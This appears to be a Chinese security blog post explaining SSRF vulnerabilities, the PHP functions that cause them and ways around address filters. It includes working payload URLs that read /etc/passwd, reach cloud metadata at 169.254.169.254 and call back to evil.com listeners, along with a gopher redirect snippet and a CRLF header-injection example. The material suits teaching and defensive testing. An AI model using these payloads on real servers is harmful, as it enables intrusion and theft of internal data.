
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <title>SSRF漏洞 | Nbc7rs&#39;Blog</title>
        <meta name="author" content="Nbc" />
        <meta name="description" content="" />
        <meta name="keywords" content="" />
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
        <link rel="icon" href="/images/jdly.jpg" />
        <script src="https://cdn.staticfile.org/vue/3.2.47/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.3.0/css/all.min.css" />
<link rel="stylesheet" href="/css/fonts.min.css" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>


<script src="https://cdn.staticfile.org/highlight.js/11.7.0/highlight.min.js"></script>
<link
    rel="stylesheet"
    href="https://cdn.staticfile.org/highlight.js/11.7.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

    <meta name="generator" content="Hexo 6.3.0"></head>
    <body>
        <div id="layout">
            <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
            </transition>
            <nav id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <div class="desktop-menu">
        <a class="title" href="/">
            <span>NBC7RS&#39;BLOG</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="curtain" @click="shouMenuItems = !shouMenuItems" v-show="shouMenuItems"></div>
        <div class="title" @click="shouMenuItems = !shouMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;NBC7RS&#39;BLOG</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="shouMenuItems">
            
            <a href="/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>

            <transition name="into">
            <div id="main" v-show="!loading">
                <div class="article">
    <div>
        <h1>SSRF漏洞</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/4/12
        </span>
        
        
    </div>
    
    <div class="content" v-pre>
        <p> SSRF (Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，由服务端发起请 求的安全漏洞。 一些服务端提供了从其他服务器应用获取数据的功能，但又没有对目标地址做严格过滤与限制，导致攻 击者可以传入任意的地址来让后端服务器对其发起请求，并返回对该目标地址请求的数据。 SSRF影响外网访问不了的内网系统。  </p>
<p><a name="EvwBo"></a></p>
<h1 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h1><ul>
<li>对外网、服务器所在内网、本地进行端口扫描 </li>
<li>攻击运行在内网或本地的应用程序 </li>
<li>对内网 WEB 应用进行指纹识别，通过访问默认文件实现 (如：readme文件) </li>
<li>攻击内外网的 web 应用，主要是使用 GET 参数就可以实现的攻击 (如：Struts2，SQLi) </li>
<li>下载内网资源(利用file协议读取本地文件等) </li>
<li>进行跳板 </li>
<li>无视cdn </li>
<li>利用Redis未授权访问，HTTP CRLF注入实现getshell<br><a name="Cs7ZB"></a></li>
</ul>
<h1 id="引发漏洞函数"><a href="#引发漏洞函数" class="headerlink" title="引发漏洞函数"></a>引发漏洞函数</h1><p><a name="vWsof"></a></p>
<h2 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents()"></a>file_get_contents()</h2><p>功能：把整个文件读入一个字符串中。<br /> file_get_contents()支持读取远程文件。<br><a name="Mb73y"></a></p>
<h2 id="curl-exec"><a href="#curl-exec" class="headerlink" title="curl_exec()"></a>curl_exec()</h2><p>功能：初始化一个cURL会话，设置参数之后调用。 curl_exec()函数主要就是调用curl。<br /> curl是一个利用URL语法在命令行下工作的文件传输工具，它可以进行网络请求。<br /> curl支持很多协议，有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP。<br><a name="KSHiN"></a></p>
<h2 id="fsockopen"><a href="#fsockopen" class="headerlink" title="fsockopen()"></a>fsockopen()</h2><p>功能：打开一个网络连接或者一个Unix套接字连接。<br /> socket是套接字，也就是发起网络请求，同样也能够进行SSRF攻击。<br><a name="KQSnS"></a></p>
<h2 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h2><table>
<thead>
<tr>
<th><br />- 一般情况下PHP不会开启fopen的gopher wrapper<br />- file_get_contents的gopher协议不能URL编码<br />- file_get_contents关于Gopher的302跳转会出现bug，导致利用失败<br />- curl&#x2F;libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用<br />- curl_exec() 默认不跟踪跳转，<br />- file_get_contents() file_get_contents支持php:&#x2F;&#x2F;input协议<br /></th>
</tr>
</thead>
</table>
<p><a name="gIDHk"></a></p>
<h1 id="SSRF中URL的伪协议"><a href="#SSRF中URL的伪协议" class="headerlink" title="SSRF中URL的伪协议"></a>SSRF中URL的伪协议</h1><p>file:&#x2F;&#x2F;&#x2F; 从文件系统中获取文件内容，如，file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd<br />dict:&#x2F;&#x2F; 字典服务器协议，访问字典资源，如，dict:&#x2F;&#x2F;&#x2F;ip:6739&#x2F;info：<br />sftp:&#x2F;&#x2F; SSH文件传输协议或安全文件传输协议<br />ldap:&#x2F;&#x2F; 轻量级目录访问协议<br />tftp:&#x2F;&#x2F; 简单文件传输协议<br />gopher:&#x2F;&#x2F; 分布式文档传递服务，可使用gopherus生成payload<br><a name="Qtn5h"></a></p>
<h2 id="1、file"><a href="#1、file" class="headerlink" title="1、file"></a>1、file</h2><p>这种URL Schema可以尝试从文件系统中获取文件：</p>
<pre><code class="php">http://example.com/ssrf.php?url=file:///etc/passwd
?url=file:///C:/Windows/win.ini
</code></pre>
<p>如果该服务器阻止对外部站点发送HTTP请求，或启用了白名单防护机制，只需使用如下所示的URL Schema就可以绕过这些限制：</p>
<p><a name="X73Bx"></a></p>
<h2 id="2、dict"><a href="#2、dict" class="headerlink" title="2、dict"></a>2、dict</h2><p>这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表：</p>
<p><a href="http://example.com/ssrf.php?dict://evil.com:1337/">http://example.com/ssrf.php?dict://evil.com:1337/</a><br />evil.com:$ nc -lvp 1337<br />Connection from [192.168.0.12] port 1337[tcp&#x2F;*]<br />accepted (family 2, sport 31126)CLIENT libcurl 7.40.0</p>
<p><a name="DzbGV"></a></p>
<h2 id="3、sftp"><a href="#3、sftp" class="headerlink" title="3、sftp"></a>3、sftp</h2><p>在这里，Sftp代表SSH文件传输协议（SSH File Transfer Protocol），或安全文件传输协议（Secure File Transfer Protocol），这是一种与SSH打包在一起的单独协议，它运行在安全连接上，并以类似的方式进行工作。</p>
<p><a href="http://example.com/ssrf.php?url=sftp://evil.com:1337/">http://example.com/ssrf.php?url=sftp://evil.com:1337/</a><br />evil.com:$ nc -lvp 1337<br />Connection from [192.168.0.12] port 1337[tcp&#x2F;*]<br />accepted (family 2, sport 37146)SSH-2.0-libssh2_1.4.2</p>
<p><a name="u2KLA"></a></p>
<h2 id="4、ldap-x2F-x2F-或ldaps-x2F-x2F-或ldapi-x2F-x2F"><a href="#4、ldap-x2F-x2F-或ldaps-x2F-x2F-或ldapi-x2F-x2F" class="headerlink" title="4、ldap:&#x2F;&#x2F;或ldaps:&#x2F;&#x2F; 或ldapi:&#x2F;&#x2F;"></a>4、ldap:&#x2F;&#x2F;或ldaps:&#x2F;&#x2F; 或ldapi:&#x2F;&#x2F;</h2><p>LDAP代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。</p>
<p><a href="http://example.com/ssrf.php?url=ldap://localhost:1337/%0Astats%0Aquithttp://example.com/ssrf.php?url=ldaps://localhost:1337/%0Astats%0Aquithttp://example.com/ssrf.php?url=ldapi://localhost:1337/%0Astats%0Aquit">http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquithttp://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquithttp://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit</a></p>
<p><a name="lTqba"></a></p>
<h2 id="5、tftp-x2F-x2F"><a href="#5、tftp-x2F-x2F" class="headerlink" title="5、tftp:&#x2F;&#x2F;"></a>5、tftp:&#x2F;&#x2F;</h2><p>TFTP（Trivial File Transfer Protocol,简单文件传输协议）是一种简单的基于lockstep机制的文件传输协议，它允许客户端从远程主机获取文件或将文件上传至远程主机。</p>
<p><a href="http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET">http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET</a><br />evil.com:# nc -lvup 1337<br />Listening on [0.0.0.0] (family 0, port1337)TESTUDPPACKEToctettsize0blksize512timeout3</p>
<p><a name="tmdEv"></a></p>
<h2 id="6、gopher-x2F-x2F"><a href="#6、gopher-x2F-x2F" class="headerlink" title="6、gopher:&#x2F;&#x2F;"></a>6、gopher:&#x2F;&#x2F;</h2><p>Gopher是一种分布式文档传递服务。利用该服务，用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。</p>
<p><a href="http://example.com/ssrf.php?url=http://attacker.com/gopher.php">http://example.com/ssrf.php?url=http://attacker.com/gopher.php</a> gopher.php (host it on acttacker.com):-<?php header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');?><br />evil.com:# nc -lvp 1337<br />Listening on [0.0.0.0] (family 0, port1337)Connection from [192.168.0.12] port 1337[tcp&#x2F;*] accepted (family 2, sport 49398)Hissrftest<br><a name="o3SmT"></a></p>
<h1 id="SSRF绕过方式"><a href="#SSRF绕过方式" class="headerlink" title="SSRF绕过方式"></a>SSRF绕过方式</h1><p>部分存在漏洞，或者可能产生SSRF的功能中做了白名单或者黑名单的处理，来达到阻止对内网服务和资源的攻击和访问。因此想要达到SSRF的攻击，需要对请求的参数地址做相关的绕过处理，常见的绕过方式如下：</p>
<p><a name="lTDnb"></a></p>
<h2 id="1、限制为http-www-xxx-com-域名时（利用-）"><a href="#1、限制为http-www-xxx-com-域名时（利用-）" class="headerlink" title="1、限制为http://www.xxx.com 域名时（利用@）"></a>1、限制为<a target="_blank" rel="noopener" href="http://www.xxx.com/">http://www.xxx.com</a> 域名时（利用@）</h2><p>可以尝试采用http基本身份认证的方式绕过<br />如：<a target="_blank" rel="noopener" href="http://www.aaa.com%40www.bbb.com@www.ccc.com/">http:&#x2F;&#x2F;www.aaa.com@www.bbb.com@www.ccc.com</a>，在对@解析域名中，不同的处理函数存在处理差异<br />在PHP的parse_url中会识别<a target="_blank" rel="noopener" href="http://www.ccc.com,而libcurl则识别为www.bbb.com./">www.ccc.com，而libcurl则识别为www.bbb.com。</a></p>
<p><a name="ABRH9"></a></p>
<h2 id="2-采用短网址绕过"><a href="#2-采用短网址绕过" class="headerlink" title="2.采用短网址绕过"></a>2.采用短网址绕过</h2><p>比如百度短地址<a target="_blank" rel="noopener" href="https://dwz.cn/">https://dwz.cn/</a></p>
<p><a name="XJV15"></a></p>
<h2 id="3-采用进制转换"><a href="#3-采用进制转换" class="headerlink" title="3.采用进制转换"></a>3.采用进制转换</h2><p>127.0.0.1八进制：0177.0.0.1。十六进制：0x7f.0.0.1。十进制：2130706433.</p>
<p><a name="B2gDB"></a></p>
<h2 id="4-利用特殊域名"><a href="#4-利用特殊域名" class="headerlink" title="4.利用特殊域名"></a>4.利用特殊域名</h2><p>原理是DNS解析。xip.io可以指向任意域名，即<br />127.0.0.1.xip.io，可解析为127.0.0.1<br />(xip.io 现在好像用不了了，可以找找其他的)</p>
<p><a name="fkP9D"></a></p>
<h2 id="5-利用"><a href="#5-利用" class="headerlink" title="5.利用[::]"></a>5.利用[::]</h2><p>可以利用[::]来绕过localhost<br /><a href="http://169.254.169.254>>http://[::169.254.169.254]">http://169.254.169.254>>http:&#x2F;&#x2F;[::169.254.169.254]</a></p>
<p><a name="JuXyk"></a></p>
<h2 id="6-利用句号"><a href="#6-利用句号" class="headerlink" title="6.利用句号"></a>6.利用句号</h2><p>127。0。0。1 &gt;&gt;&gt; 127.0.0.1</p>
<p><a name="zz4un"></a></p>
<h2 id="7、CRLF-编码绕过"><a href="#7、CRLF-编码绕过" class="headerlink" title="7、CRLF 编码绕过"></a>7、CRLF 编码绕过</h2><p>%0d-&gt;0x0d-&gt;\r回车<br />%0a-&gt;0x0a-&gt;\n换行<br />进行HTTP头部注入</p>
<p>example.com&#x2F;?url&#x3D;<a href="http://eval.com%0d%0aHOST:fuzz.com%0d%0a">http://eval.com%0d%0aHOST:fuzz.com%0d%0a</a> <br />1<br><a name="wlZtW"></a></p>
<h2 id="8-利用封闭的字母数字"><a href="#8-利用封闭的字母数字" class="headerlink" title="8.利用封闭的字母数字"></a>8.利用封闭的字母数字</h2><p>利用Enclosed alphanumerics<br />ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ &gt;&gt;&gt; example.com<br />[<a href="http://169.254.169.254>>>http://[::](http://169.254.169.254>>>http://[::)①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]">http://169.254.169.254&gt;&gt;&gt;http://[::](http://169.254.169.254&gt;&gt;&gt;http://[::)①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]</a><br />List:<br />① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳<br />⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇<br />⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛<br />⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵<br />Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ<br />ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ<br />⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴<br />⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿</p>

    </div>
    
    
    
    
    
    
    
</div>

                <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2023 Nbc7rs&#39;Blog
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;Nbc
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

            </div>
            </transition>
            
            <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
            </transition>
            
        </div>
        <script src="/js/main.js"></script>
        
        




        
    </body>
</html>
